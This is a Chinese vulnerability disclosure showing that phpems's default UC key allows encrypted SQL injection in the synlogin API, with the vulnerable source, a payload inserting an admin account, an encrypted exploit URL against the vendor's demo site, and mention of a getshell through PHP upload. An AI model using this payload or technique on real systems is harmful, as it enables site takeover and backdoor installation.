### 简要描述: phpems 默认uc_key是1234567890 导致可以用uc的加密函数加密恶意代码带到sql语句中。 ### 详细说明: ``` if(!defined('IN_UC')) { error_reporting(0); set_magic_quotes_runtime(0); defined('MAGIC_QUOTES_GPC') || define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc()); require_once 'config.inc.php'; $_DCACHE = $get = $post = array(); $code = @$_GET['code']; //code=加密代码 parse_str(_authcode($code, 'DECODE', UC_KEY), $get); //到这里进行解密 //var_dump($get); if(MAGIC_QUOTES_GPC) { $get = _stripslashes($get); //不明白这里用意,解密后把反斜杠去掉 } $timestamp = time(); echo $timestamp - $get['time']; if($timestamp - $get['time'] > 3600) { //time可控 exit('Authracation has expiried'); } if(empty($get)) { exit('Invalid Request'); } $action = $get['action']; //action可控 require_once 'uc_client/lib/xml.class.php'; $post = xml_unserialize(file_get_contents('php://input')); if(in_array($get['action'], array('test', 'deleteuser', 'renameuser', 'gettag', 'synlogin', 'synlogout', 'updatepw', 'updatebadwords', 'updatehosts', 'updateapps', 'updateclient', 'updatecredit', 'getcreditsettings', 'updatecreditsettings'))) { /** require_once 'include/db_mysql.class.php'; $GLOBALS['db'] = new dbstuff; $GLOBALS['db']->connect($dbhost, $dbuser, $dbpw, $dbname, $pconnect, true, $dbcharset); print_r($GLOBALS['db']); $GLOBALS['tablepre'] = $tablepre; unset($dbhost, $dbuser, $dbpw, $dbname, $pconnect); **/ $uc_note = new uc_note(); //file_put_contents('aa.txt','1'); exit($uc_note->$get['action']($get, $post)); } else { exit(API_RETURN_FAILED); } } else { ``` uc_note->synlogin ``` function synlogin($get, $post) { $uid = $get['uid']; //$username = iconv('gbk','utf-8',$get['username']); //gbk版本论坛使用上行 $username = $get['username']; //UTF8版本使用上行 if(!API_SYNLOGIN) { return API_RETURN_FORBIDDEN; } $sql = "set names utf8"; $this->dblink->query($sql); $sql = "SELECT * FROM ".DTH."user WHERE username = '{$username}'"; //注入点1 $u = $this->dblink->fetch_first($sql); $args = array(); if(!$u){ //提交个不存在的用户这里$u就为null $sql = "SELECT * FROM ".DTH."user_group WHERE 
groupdefault = '1'"; $g = $this->dblink->fetch_first($sql); $grouid = $g['groupid']; $email = $username."@phpems.net"; $pass = md5(rand(1000,9999)); $sql = "INSERT INTO ".DTH."user (`username`,`useremail`,`userpassword`,`usergroupid`,`userregtime`,`userregip`) VALUES ('{$username}','{$email}','{$pass}','{$grouid}','".TIME."','".$this->_getClientIp()."')"; //username可控制,是解密后得到的内容 那么就可以直接添加一个管理员 $this->dblink->query($sql); $args = array('sessionuserid'=>$this->dblink->insert_id(),'sessionpassword'=>$pass,'sessionip'=>$this->_getClientIp(),'sessiongroupid'=>$grouid,'sessionlogintime'=>TIME,'sessionusername'=>$username); } else $args = array('sessionuserid'=>$u['userid'],'sessionpassword'=>$u['userpassword'],'sessionip'=>$this->_getClientIp(),'sessiongroupid'=>$u['usergroupid'],'sessionlogintime'=>TIME,'sessionusername'=>$u['username']); if(!$args['sessiontimelimit'])$args['sessiontimelimit'] = TIME; if(!$this->sessionid)$this->_getSessionId(); $args['sessionid'] = $this->sessionid; $args['sessiontimelimit'] = TIME; $data = array('session',$args); $sql = $this->_makeReplace($data); $this->dblink->query($sql); ``` ### 漏洞证明: 官方demo来测试: [<img src="https://images.seebug.org/upload/201502/041512385fe3e1435626bea1dc5b052ce67073b5.png" alt="phpems.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/041512385fe3e1435626bea1dc5b052ce67073b5.png) 现在没有testadmin这个帐号,我们来添加一个 加密这句话然后提交 $str="time=2999999999999999&action=synlogin&username=testadmin','test@test.coom','e10adc3949ba59abbe56e057f20f883e','1','2015-02-04','127.0.0.1')#"; [<img src="https://images.seebug.org/upload/201502/04152040b988a4874fbaabf7481b87e4a0044e9e.png" alt="jm.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/04152040b988a4874fbaabf7481b87e4a0044e9e.png) 
www.phpems.net/2014/api/uc.php?code=b843/GkLQIWizbadvdy6o9/js/s0OOsDQZq3KhHhyW2nzNTxN6WfQg%2BnwtL3Qbz3YXVpYmC8ibpOgTv9cGHr3TwHHikzy7GtDTEQukPOXPVUzzraPvurp0F78QTp9/ggYXev9PP/iawD/u0lLkhLuf3a2rMZco0l6lbtBQhOC%2BLLKQldXEcjVN0mRV8GrxkEyOBjq0jWVjMuVlzT%2BFNcfqrej0RPozYcWgs0OOsDQZq3KhHhyW2nzNTxN6WfQg

提交后，账号 testadmin（密码：123456）即可在前台登录；再点击“后台管理”即可直接进入后台，无需另行寻找后台入口。后台编辑器可以直接上传 php 文件：

[<img src="https://images.seebug.org/upload/201502/04151602b10fc9811ef4c9b2e79480c7b15a6ab6.png" alt="phpcms1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/04151602b10fc9811ef4c9b2e79480c7b15a6ab6.png)

此前已有人利用 uc key getshell 并留下了后门：

[<img src="https://images.seebug.org/upload/201502/04151726a3c5159761ef3d2ef903fbb4ff18a062.png" alt="phpems2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/04151726a3c5159761ef3d2ef903fbb4ff18a062.png)

其他站点：

[<img src="https://images.seebug.org/upload/201502/04152404981408a2f55d0d38cf1d0a0525d68635.png" alt="qt.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/04152404981408a2f55d0d38cf1d0a0525d68635.png)